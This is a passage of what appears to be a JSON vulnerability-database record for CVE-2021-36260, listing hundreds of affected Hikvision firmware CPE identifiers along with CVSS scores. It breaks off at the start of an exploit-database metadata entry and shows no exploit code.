"cpe:/o:hikvision:ds-2cd2347g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2143g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df6a425x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242ix-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2546g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2df6a225x-ael\\)t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td6237-50h4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd3086g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd2027g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-7104ni-q1\\/4p_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd3743g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2066g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2586g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2td6267-100c4l\\/wy_firmware:-", "cpe:/o:hikvision:ds-2td6267-75c4l\\/wy_firmware:-", "cpe:/o:hikvision:ds-2cd2347g2-lsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2387g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3543g2-is_firmware:-", "cpe:/o:hikvision:ptz-n5225i-a_firmware:-", "cpe:/o:hikvision:ds-2cd2686g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2027g2-lu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3356g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ih-ael_firmware:-", "cpe:/o:hikvision:ds-2dy9236i8x-a_firmware:-", "cpe:/o:hikvision:ds-2cd3726g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2087g2-l\\(u\\)_firmware:-"], "id": "CVE-2021-36260", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:hikvision:ds-2df8425ix-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242ix-aely\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3743g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2066g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3356g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2vs435-f840-ey\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8236i5x-aelw_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3056g2iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3756g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242i5x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2043g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7225ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3356g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6266t-50h2l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3026g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3356g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2386g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7108ni-q1_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3063g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-180ze2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2686g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2387g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2383g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a425x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-q2_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2583g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-760ni-k1\\/4p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n4225i-de_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1\\/4p\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9250izs-a\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3026g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df5225x-ae3\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236i8x-a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4137-25\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2083g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2027g2-lu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2186g2-isu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2143g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236x-a\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a436x-aely\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2663g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2021g1-i\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242i5x-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2527g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442nxs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ih-ael_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2vs435-f840-ey_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2347g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2sk8144ixs-d\\/j_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2027g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2123g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2147g2-l\\(su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-75c4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2421g0-i\\(d\\)\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1\\/4g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1217b-6\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2123g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3586g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g0-i\\(w\\)\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-k1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6266t-25h2l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2347g2-lsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2426g2-i_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242i5x-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2pt9a144mxs-d\\/t2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2626g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q2\\/8p_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8425ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-100c4l\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2343g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aelwy\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-230zg2f\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2183g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2327g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8250i8x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aelw\\(t2\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3156g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a842ixs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2186g2-i\\(su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6237-75c4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n2204i-de3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2686g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3523g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2323g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4167-25\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2066g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-aely\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-230zg2f\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3726g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2683g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2063g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3186g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g1-i\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4166t-9_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3526g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7604ni-q1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2547g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3126g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3023g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df5225x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2386g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a825x-ael_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2586g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2621g0-i\\(z\\)\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3056g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2346g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1\\/4p_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7104ni-q1\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2166g2-i\\(su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2121g1-idw_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3556g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3343g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3386g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7225ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6237-50h4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2087g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2127g2-\\(-su\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-150zc4f\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6482f-izhrs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3123g2-i\\(s\\)u_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n2404i-de3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3563g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a225x-ael\\)t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-100c4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a836x-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2547g2-lzs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a236x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7604ni-k1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-q2\\/16p_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3056g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3143g2-i\\(s\\)u_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2546g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n4215i-de_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ids-2sk718mxs-d_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1217b-3\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7108ni-q1\\/8p\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3626g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2366g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2446g2-i_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2023g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2643g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2743g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8436i5x-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236ix-a\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2047g2-l\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3326g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2143g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3763g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df5232x-ae3\\)t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2366g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7604ni-k1\\/4p\\/4g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1117-2\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-ael\\(t2\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3547g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4136t-9_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2623g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2421g0-i\\(d\\)w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-100c2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7616ni-q1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2646g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4137-50\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3723g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2326g2-isu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2766g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dyh2a0ixs-d\\(t2\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3386g2-is\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2786g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8425ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3347g2-ls\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2721g0-i\\(z\\)\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-150zh2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2163g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7232ix-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q1\\/8p_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2723g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7108ni-q1\\/8p_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2086g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3363g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242ix-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2183g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aelw\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2183g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy92500x-a\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a436x-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3643g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3043g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3126g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2543g2-i\\(ws\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8425ix-ael\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2526g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2563g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1117-3\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2523g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9236i8x-a\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7604ni-q1\\/4p_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2086g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6422fwd-izhrs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2163g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8a442ixs-af\\/sp\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3786g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2046g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3086g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1\\/8p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3156g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2566g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-50h4l\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2523g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3163g2-i\\(s\\)u_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df6a436x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3047g2-ls_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3323g2-iu_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8442ixs-aely\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6442f-izhrs\\(b\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6267-75c4l\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2321g0-i\\/nf_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2363g2-i\\(u\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-190ze2f\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q2_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-150ze2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8242ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3663g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2dy9240ix-a\\(t5\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2783g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3656g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2666g2-izsu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df8225ih-ael\\(w\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2763g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6242f-is\\/316l\\(b\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n4215-de3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2xe6452f-izh\\(r\\)s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df7232ix-aelw\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td1117-6\\/pa_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2df5232x-ael\\(t3\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3623g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td4167-50\\/w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-k1\\/8p\\/4g_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2666g2-izs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7608ni-q1_firmware:4.31.000:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2526g2-i\\(s\\)_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td6236t-50h2l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-7108ni-q1\\/m_firmware:4.31.100:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3543g2-is_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd2026g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8167-190ze2f\\/wy_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ptz-n5225i-a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2td8166-75c2f\\/v2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:hikvision:ds-2cd3686g2-izs_firmware:-:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T05:28:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 